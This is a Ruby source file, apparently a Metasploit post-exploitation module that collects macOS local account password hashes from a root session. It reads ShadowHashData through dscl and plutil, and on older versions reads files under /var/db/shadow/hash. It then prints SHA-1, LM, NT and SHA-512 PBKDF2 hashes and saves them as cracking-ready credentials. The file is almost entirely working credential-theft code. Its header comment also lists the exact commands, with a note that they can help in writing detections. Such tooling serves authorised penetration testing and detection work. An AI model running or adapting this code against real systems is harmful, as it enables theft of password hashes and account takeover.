Path: blob/master/modules/post/osx/gather/hashdump.rb
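##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'
require 'shellwords'

# Post module that reads local account password hashes from an OS X session
# already running as root and stores them as credentials in the database.
#
# Host-side footprint per account, as issued by the code below (useful when
# writing or validating detections for this behaviour):
#   * 10.7 and 10.8+: `dscl . read /Users/<name> dsAttrTypeNative:ShadowHashData`
#   * 10.8+ only:     `/bin/bash -c 'echo -ne "<\x-escaped bytes>" | plutil -convert xml1 - -o -'`
#   * 10.5 / 10.6:    `/usr/bin/dscl localhost -read /Search/Users/<name>` piped to grep/cut
#   * 10.4 and below: `/usr/bin/niutil -readprop . /users/<name> generateduid`
#   * 10.6 and below: three `cat /var/db/shadow/hash/<GUID> | cut ...` reads
#
# Every recovered hash is also printed to the console by report_hash, so the
# console output carries credential material as well as the database.
class MetasploitModule < Msf::Post
  # set of accounts to ignore while pilfering data
  # OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Auxiliary::Report

  # Registers module metadata and the optional MATCHUSER account filter.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OS X Gather Mac OS X Password Hash Collector',
        'Description' => %q{
          This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports
          versions 10.3 to 10.14.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'hammackj <jacob.hammack[at]hammackj.com>',
          'joev'
        ],
        'Platform' => [ 'osx' ],
        'SessionTypes' => %w[shell meterpreter]
      )
    )
    register_options([
      OptRegexp.new('MATCHUSER', [
        false,
        'Only attempt to grab hashes for users whose name matches this regex'
      ])
    ])
  end

  # Run Method for when run command is issued.
  #
  # Aborts unless the session is root, then walks the non-system accounts and
  # dispatches to the collector that matches the detected OS X version.
  #
  # @return [void]
  def run
    unless is_root?
      fail_with(Failure::BadConfig, 'Insufficient Privileges: must be running as root to dump the hashes')
    end

    # iterate over all users
    get_nonsystem_accounts.each do |user_info|
      user = user_info['name']
      next if user.blank?
      next if datastore['MATCHUSER'].present? && datastore['MATCHUSER'] !~ (user)

      print_status "Attempting to grab shadow for user #{user}..."
      if gt_lion? # 10.8+
        collect_pbkdf2_hash(user)
      elsif lion? # 10.7
        collect_lion_hashes(user)
      else # 10.6 and below
        collect_legacy_hashes(user)
      end
    end
  end

  private

  # 10.8+: pulls ShadowHashData through dscl, converts the embedded binary
  # plist to XML with the target's plutil and reports the sha512pbkdf2 entry.
  #
  # @param user [String] account short name
  # @return [void]
  def collect_pbkdf2_hash(user)
    # pull the shadow from dscl
    shadow_bytes = grab_shadow_blob(user)
    return if shadow_bytes.blank?

    # The blob is interpolated into a quoted bash command below, so anything
    # that is not an even-length run of hex digits is rejected first.
    unless shadow_bytes.match?(/\A(?:\h{2})+\z/)
      print_error("Unexpected ShadowHashData format for user #{user}, skipping")
      return
    end

    # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist
    # Here we pull out the binary plist bytes and use built-in plutil to convert to xml
    plist_bytes = shadow_bytes.scan(/../).map { |byte| "\\x#{byte}" }.join

    # encode the bytes as \x hex string, print using bash's echo, and pass to plutil
    shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'")

    decoded_hash = parse_pbkdf2_plist(shadow_plist)
    if decoded_hash.nil?
      print_error("Could not parse the ShadowHashData plist for user #{user}")
      return
    end

    report_hash('SHA-512 PBKDF2', decoded_hash, user)
  end

  # Extracts iterations, salt and entropy from the XML plist produced by
  # plutil. Lookup is positional, exactly as the module has always done it:
  # second child of the top-level dict, then its children 2, 4 and 6.
  #
  # @param plist_xml [String] XML text returned by plutil
  # @return [String] hash in "$ml$<iterations>$<salt>$<entropy>" form
  # @return [nil] if the text is not XML or an expected element is missing
  def parse_pbkdf2_plist(plist_xml)
    # read the plaintext xml
    shadow_xml = REXML::Document.new(plist_xml)

    # same path as elements[1].elements[1].elements[2], but nil-safe
    dict = [1, 1, 2].reduce(shadow_xml) { |node, index| node&.elements&.[](index) }
    return nil if dict.nil?

    # parse out the different parts of sha512pbkdf2
    entropy_b64, iterations, salt_b64 = [2, 4, 6].map do |index|
      dict.elements[index]&.text.to_s.gsub(/\s+/, '')
    end
    return nil if [entropy_b64, iterations, salt_b64].any?(&:empty?)

    entropy = Rex::Text.to_hex(entropy_b64.unpack1('m*'), '')
    salt = Rex::Text.to_hex(salt_b64.unpack1('m*'), '')

    # PBKDF2 stored in <iterations, salt, entropy> format
    "$ml$#{iterations}$#{salt}$#{entropy}"
  rescue REXML::ParseException
    # plutil error text instead of XML must not abort the remaining accounts
    nil
  end

  # 10.7: ShadowHashData is already plain hex text; slices the NT hash (when
  # present) and the salted SHA-512 hash out by their marker bytes.
  #
  # @param user [String] account short name
  # @return [void]
  def collect_lion_hashes(user)
    # pull the shadow from dscl
    shadow_bytes = grab_shadow_blob(user)
    return if shadow_bytes.blank?

    # on 10.7 the ShadowHashData is stored in plaintext
    hash_decoded = shadow_bytes.downcase

    # Check if NT HASH is present. String#[] yields nil when the full pattern
    # does not match; report_hash ignores blank values, so a partial marker no
    # longer raises NoMethodError on nil.
    if hash_decoded.include?('4f1010')
      report_hash('NT', hash_decoded[/^\w*4f1010(\w*)4f1044/, 1], user)
    end

    # slice out the sha512 hash + salt
    # original regex left for historical purposes. During testing it was discovered that
    # 4f110200 was also a valid end. Instead of looking for the end, since its a hash (known
    # length) we can just set the length
    # sha512 = hash_decoded.scan(/^\w*4f1044(\w*)(080b190|080d101e31)/)[0][0]
    sha512 = hash_decoded[/^\w*4f1044(\w{136})/, 1]
    if sha512.nil?
      print_error("No SHA-512 section found in ShadowHashData for user #{user}")
      return
    end

    report_hash('SHA-512', sha512, user)
  end

  # 10.6 and below: resolves the account's GeneratedUID, then reads fixed
  # column ranges of /var/db/shadow/hash/<GUID> for the SHA-1, NT and LM hashes.
  #
  # @param user [String] account short name
  # @return [void]
  def collect_legacy_hashes(user)
    # Account names come from the target host; escape before they reach a shell.
    escaped_user = Shellwords.escape(user)

    # On 10.6 and below, SHA-1 is used for encryption
    guid = if gte_leopard?
             cmd_exec("/usr/bin/dscl localhost -read /Search/Users/#{escaped_user} | grep GeneratedUID | cut -c15-").chomp
           elsif lte_tiger?
             cmd_exec("/usr/bin/niutil -readprop . /users/#{escaped_user} generateduid").chomp
           end

    # guid is nil when no version predicate matched (ver_num is not a 10.x
    # string) and empty when the lookup returned nothing. Without this guard
    # the reads below would target the hash directory itself.
    if guid.blank?
      print_error("Could not determine GeneratedUID for user #{user}, skipping")
      return
    end

    shadow_file = "/var/db/shadow/hash/#{Shellwords.escape(guid)}"

    # Extract the hashes
    sha1_hash = cmd_exec("cat #{shadow_file} | cut -c169-216").chomp
    nt_hash = cmd_exec("cat #{shadow_file} | cut -c1-32").chomp
    lm_hash = cmd_exec("cat #{shadow_file} | cut -c33-64").chomp

    # Check that we have the hashes and save them
    report_hash('SHA-1', sha1_hash, user) if usable_hash?(sha1_hash, /0000000000000000000000000/)
    report_hash('NT', nt_hash, user) if usable_hash?(nt_hash, /000000000000000/)
    report_hash('LM', lm_hash, user) if usable_hash?(lm_hash, /0000000000000/)
  end

  # Decides whether a value read from the shadow file should be stored.
  # Requiring hex digits keeps command error text (e.g. from a failed cat)
  # from being recorded as a credential.
  #
  # @param value [String] text returned by the cut pipeline
  # @param blank_pattern [Regexp] run of zeros that marks an unset hash slot
  # @return [Boolean]
  def usable_hash?(value, blank_pattern)
    value.match?(/\A\h+\z/) && value !~ blank_pattern
  end

  # Only version strings containing "10.<minor>" are recognised by the four
  # predicates below; for any other string they all return nil.
  #
  # @return [Bool] system version is at least 10.5
  def gte_leopard?
    (ver_num =~ /10\.(\d+)/) && ::Regexp.last_match(1).to_i >= 5
  end

  # @return [Bool] system version is at least 10.8
  def gt_lion?
    (ver_num =~ /10\.(\d+)/) && ::Regexp.last_match(1).to_i >= 8
  end

  # @return [String] hostname
  def host
    session.session_host
  end

  # @return [Bool] system version is 10.7
  def lion?
    (ver_num =~ /10\.(\d+)/) && ::Regexp.last_match(1).to_i == 7
  end

  # @return [Bool] system version is 10.4 or lower
  def lte_tiger?
    (ver_num =~ /10\.(\d+)/) && ::Regexp.last_match(1).to_i <= 4
  end

  # parse the dslocal plist in lion
  #
  # Pairs the n-th plist/dict/key with the n-th plist/dict/array and collects
  # the text of each array child, with "\n\t\t" indentation runs removed.
  #
  # @param plist_content [String] XML plist text
  # @return [Hash{String => Array<String, nil>}] values keyed by plist key
  def read_ds_xml_plist(plist_content)
    doc = REXML::Document.new(plist_content)
    keys = []
    doc.elements.each('plist/dict/key') { |node| keys << node.text }

    fields = {}
    position = 0
    doc.elements.each('plist/dict/array') do |element|
      values = []
      fields[keys[position]] = values
      element.each_element('*') do |child|
        # children without text are kept as nil placeholders
        values << child.text&.gsub("\n\t\t", '')
      end
      position += 1
    end
    fields
  end

  # reports the hash info to metasploit backend
  #
  # Prints "<type>:<user>:<hash>" to the console and creates a credential
  # tied to the current session. Blank hashes are ignored.
  #
  # @param type [String] one of 'NT', 'LM', 'SHA-512 PBKDF2', 'SHA-512', 'SHA-1'
  # @param hash [String, nil] hash text
  # @param user [String] account short name
  # @return [void]
  def report_hash(type, hash, user)
    return unless hash.present?

    print_good("#{type}:#{user}:#{hash}")
    case type
    when 'NT'
      private_data = "#{Metasploit::Credential::NTLMHash::BLANK_LM_HASH}:#{hash}"
      private_type = :ntlm_hash
      jtr_format = 'ntlm'
    when 'LM'
      private_data = "#{hash}:#{Metasploit::Credential::NTLMHash::BLANK_NT_HASH}"
      private_type = :ntlm_hash
      jtr_format = 'lm'
    when 'SHA-512 PBKDF2'
      private_data = hash
      private_type = :nonreplayable_hash
      jtr_format = 'PBKDF2-HMAC-SHA512'
    when 'SHA-512'
      private_data = hash
      private_type = :nonreplayable_hash
      jtr_format = 'xsha512'
    when 'SHA-1'
      private_data = hash
      private_type = :nonreplayable_hash
      jtr_format = 'xsha'
    else
      # Without this branch an unknown type would reach create_credential
      # with nil private data.
      print_error("Unknown hash type #{type} for user #{user}, not saved")
      return
    end
    create_credential(
      jtr_format: jtr_format,
      workspace_id: myworkspace_id,
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      username: user,
      private_data: private_data,
      private_type: private_type
    )
    print_status('Credential saved in database.')
  end

  # @param user [String] account short name
  # @return [String] containing blob for ShadowHashData in user's plist
  # @return [nil] if shadow is invalid
  def grab_shadow_blob(user)
    # Account names come from the target host; escape before they reach a shell.
    shadow_bytes = cmd_exec("dscl . read /Users/#{Shellwords.escape(user)} dsAttrTypeNative:ShadowHashData").gsub(/\s+/, '')
    return nil unless shadow_bytes.start_with? 'dsAttrTypeNative:ShadowHashData:'

    # strip the other bytes
    shadow_bytes.delete_prefix('dsAttrTypeNative:ShadowHashData:')
  end

  # Memoised, so get_sysinfo is not called again once a version was returned.
  #
  # @return [String] version string (e.g. 10.8.5)
  def ver_num
    @product_version ||= get_sysinfo['ProductVersion']
  end
end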